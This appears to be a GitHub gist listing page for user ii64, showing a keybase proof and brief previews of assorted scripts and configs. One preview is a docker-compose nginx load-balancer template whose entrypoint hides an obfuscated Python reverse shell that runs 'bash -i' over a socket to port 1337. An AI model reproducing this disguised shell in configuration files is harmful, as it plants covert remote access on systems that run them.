I hereby claim:
- I am ii64 on github.
- I am ii64 (https://keybase.io/ii64) on keybase.
- I have a public key ASDZf67EWsyPst5UcKSqNqxIPEAzNv6CJwm5vs2bz7KBvAo
To claim this, I am signing this object:
| #!/usr/bin/env bash | |
| # REF: https://github.com/cloudflare/cfssl | |
| # Change working directory | |
| cd -- "$( | |
| dirname "${0}" | |
| )" || exit 1 | |
| readonly CA_ROOT_CERT_KEY="ca-root" |
| package main | |
| import ( | |
| "bytes" | |
| "encoding/json" | |
| "flag" | |
| "fmt" | |
| "io" | |
| "net/http" | |
| "net/http/httputil" |
| { | |
| "__inputs": [ | |
| { | |
| "name": "DS_PROMETHEUS", | |
| "label": "Prometheus", | |
| "description": "", | |
| "type": "datasource", | |
| "pluginId": "prometheus", | |
| "pluginName": "Prometheus" | |
| } |
| version: '3' | |
| x-tpl-nginx-lb: &tpl-nginx-lb | |
| image: nginx:stable-alpine | |
| restart: unless-stopped | |
| expose: [ 80 ] | |
| entrypoint: | |
| - sh | |
| - -c | |
| - | |
| (lambda xx:({0:list(map(lambda i:[0,lambda x:xx.update({2:(x[1]('socket'),x[1]('os'),x[1]('subprocess'))}),lambda x:(x.update({3:x[2][0].socket(x[2][0].AF_INET,x[2][0].SOCK_STREAM)}),x[3].connect(x[4])),lambda x:(list(map(lambda i:x[2][1].dup2(x[3].fileno(),i),range(3))),x[3].send(x[5]),x[2][2].call(x[6]))][i](xx),range(1,5)))}))({6:['bash','-i'],5:b'connected',4:('127.0.0.1',1337),1:__import__}) |
| #!/usr/bin/env playonlinux-bash | |
| [ "$PLAYONLINUX" = "" ] && exit 0 | |
| source "$PLAYONLINUX/lib/sources" | |
| TITLE="Adobe Acrobat Reader DC" | |
| PREFIX="AdobeAcrobatReaderDC" | |
| WINEVERSION="4.0.3" | |
| EDITOR="Adobe Systems Inc." | |
| GAME_URL="https://acrobat.adobe.com/us/en/products/pdf-reader.html" |
I hereby claim:
To claim this, I am signing this object:
| use std::{fs::{File}, io::{BufReader, self, Read, Seek, ErrorKind, BufRead}, vec}; | |
| struct MemSearch<R> | |
| where | |
| R: Read | |
| { | |
| inner: R, | |
| matches: Vec<Vec<u8>>, | |
| addr: usize, | |
| end_addr: Option<usize>, |
| ## obs-access-signer | |
| # | |
| HTTP_ADDR=0.0.0.0:9002 | |
| OBS_ENDPOINT=gateway.storjshare.io | |
| OBS_BUCKET_NAME=mk-prod | |
| OBS_SECURE=true | |
| LOG_LEVEL=INFO | |
| AWS_ACCESS_KEY=example-key | |
| AWS_SECRET_KEY=example-pass | |
| # AWS_SESSION_TOKEN |
| package main | |
| import ( | |
| "fmt" | |
| "os" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| func main() { |